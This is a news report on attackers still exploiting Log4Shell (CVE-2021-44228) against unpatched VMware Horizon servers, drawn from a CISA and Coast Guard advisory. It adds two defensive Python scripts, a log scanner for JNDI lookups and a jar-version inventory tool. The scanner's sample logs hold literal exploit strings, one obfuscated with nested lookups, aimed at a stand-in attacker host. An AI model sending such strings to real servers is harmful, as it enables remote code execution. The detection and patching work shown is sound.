24 June 2022

Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers

Six months after a fix was released, hackers are still exploiting the infamous Log4Shell vulnerability in VMware Horizon and Unified Access Gateway servers to gain initial access to victims’ networks.

According to a recent joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), since December 2021 multiple threat actor groups, including state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers. In these attacks, threat actors were observed planting malware with embedded executables that enable remote command-and-control on the compromised systems.

The Log4Shell vulnerability (CVE-2021-44228) is a remote code execution flaw in the widely used Apache Log4j logging library. Using this bug, a threat actor can send specially crafted input to an affected system, execute malicious code, and take control of the victim’s machine.
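The crafted input the paragraph refers to is a string that Log4j interprets as a JNDI lookup when it is logged. The following detector, added here as an illustration and not taken from the advisory or from any vendor tool, scans web server log lines for such lookups. The sample log lines, IP addresses and the host name attacker.invalid are constructed for the example. It goes a little beyond the plain `${jndi:` signature: Log4j resolves nested lookups such as `${lower:j}` before the JNDI lookup runs, so the detector folds those away first, which is what catches the fourth sample line.

```python
import re

# Constructed sample access-log lines (not from the advisory). Lines 3 and 4 carry a
# JNDI lookup string in the User-Agent field; line 4 hides the keyword with nested
# lookups. Lines 1, 2 and 5 are benign (line 2 contains a harmless ${date:...} lookup).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [24/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Jun/2022:10:01:05 +0000] "GET /portal/?q=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.68"',
    '203.0.113.9 - - [24/Jun/2022:10:02:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [24/Jun/2022:10:02:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://attacker.invalid/b}"',
    '10.0.0.8 - - [24/Jun/2022:10:03:00 +0000] "POST /portal/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} resolve to x (case is irrelevant to the later match).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default} resolves to its default value when "name" is undefined,
# which is how ${::-j} or ${env:NOPE:-j} smuggle in single characters.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalisation, the lookup we care about: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested case/default lookups, innermost first, until the string is stable.

    The iteration cap keeps pathological input from looping forever.
    """
    for _ in range(10):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(lines):
    """Return (line_number, scheme, original_line) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


if __name__ == "__main__":
    for number, scheme, line in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme} -> {line}")
```

Run against real access, application or proxy logs, the scheme field (ldap, rmi, dns and so on) is worth keeping in the alert: it tells the responder which outbound connection to look for from the affected host. Note that the detector only sees what was logged; a lookup string sent in a header the server does not log will still reach Log4j, so log-based detection complements patching rather than replacing it.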

According to the joint advisory, the hackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool capable of keylogging and deploying additional malware.

The Log4Shell vulnerability was identified in November 2021 and patched a month later, three days before it was publicly disclosed. But the ongoing Log4Shell-related malicious campaign suggests that there are still many unpatched servers, and that the vulnerability remains a very valuable asset for hackers, especially advanced persistent threat groups.
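Unpatched servers are the common thread in the advisory, and the first thing a defender wants is an inventory of which Log4j builds are actually on disk, since the library is often bundled inside a product rather than installed on its own. The scanner below is an added example, not code from the advisory or from VMware, and it makes two assumptions stated in the comments: a log4j-core jar records its version in the manifest's Implementation-Version attribute, and CVE-2021-44228 is fixed from log4j-core 2.15.0 onward. The jars it scans in `demo()` are constructed stand-ins with only a manifest and a marker entry, not real Log4j builds; point `scan_directory()` at a real install tree instead.

```python
import os
import re
import tempfile
import zipfile

# CVE-2021-44228 is fixed from log4j-core 2.15.0 onward (assumption stated in the lead-in).
FIXED_VERSION = (2, 15, 0)
# The class that performs the JNDI lookup. Removing it from the jar was a documented
# mitigation, so its presence, not the jar's name, is the risk indicator we key on.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); anything non-numeric (e.g. '2.0-beta9') -> None."""
    try:
        return tuple(int(p) for p in text.split(".")[:3])
    except ValueError:
        return None


def inspect_jar(jar_path):
    """Return (has_jndi_class, version_string_or_None) for one jar."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP_CLASS in names
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
            if m:
                version = m.group(1)
    if version is None:  # fall back to the version embedded in the file name, if any
        m = re.search(r"log4j-core-(\d+\.\d+\.\d+)", os.path.basename(jar_path))
        version = m.group(1) if m else None
    return has_jndi, version


def is_vulnerable(has_jndi_class, version):
    """Vulnerable if the lookup class is present and the version is below the fix or unknown."""
    if not has_jndi_class:
        return False
    parsed = parse_version(version) if version else None
    return parsed is None or parsed < FIXED_VERSION


def scan_directory(root):
    """Walk root and report every .jar with its version and vulnerability verdict."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".jar"):
                path = os.path.join(dirpath, name)
                has_jndi, version = inspect_jar(path)
                results.append({"path": path, "version": version,
                                "has_jndi_class": has_jndi,
                                "vulnerable": is_vulnerable(has_jndi, version)})
    return results


def build_sample_jar(path, version, include_jndi_class=True):
    """Write a constructed stand-in jar (NOT a real Log4j build) for the demo."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if include_jndi_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes only


def demo():
    """Scan a temp tree holding four constructed jars; return {file name: vulnerable}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    build_sample_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    build_sample_jar(os.path.join(root, "log4j-core-2.14.1-mitigated.jar"), "2.14.1",
                     include_jndi_class=False)
    build_sample_jar(os.path.join(root, "other-lib-1.0.jar"), "1.0", include_jndi_class=False)
    return {os.path.basename(r["path"]): r["vulnerable"] for r in scan_directory(root)}


if __name__ == "__main__":
    for name, vulnerable in sorted(demo().items()):
        print(f"{name}: {'VULNERABLE' if vulnerable else 'ok'}")
```

The scan treats an unparseable or missing version as vulnerable on purpose: a jar whose version cannot be established is a finding to be resolved, not ignored. It does not descend into jars nested inside WAR or EAR archives; for a product that ships Log4j that way, extract the archive first or extend `scan_directory()` to open nested archives with the same `inspect_jar()` logic.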
